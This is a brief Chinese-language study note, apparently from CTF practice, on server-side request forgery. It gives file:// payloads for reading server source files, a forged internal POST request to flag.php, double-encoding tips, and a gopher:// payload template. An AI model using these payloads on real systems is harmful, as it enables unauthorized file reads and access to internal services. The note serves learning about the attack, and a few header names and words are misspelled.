# SSRF
简单的就不说的,直接从第二部分开始:
Gopher 协议,这东西现在不常见了,不过还是看看
# POST 请求
显示 file 伪协议读取源码
?url=file:///var/html/index.php
?url=file:///var/html/flag.php
构造请求包:
POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Length: 36
Content—Type: application/x-www-from-urlencode
key=xxxxxxx
第一次编码后将 %0A 全部换成 %0D%0A 后再进行下一次,这是为了避免混淆
为什么不能直接改请求包?
这是存在于服务端的
paload:
?url=gopher://127.0.0.1:80/_xxxxxxxxxxxxx
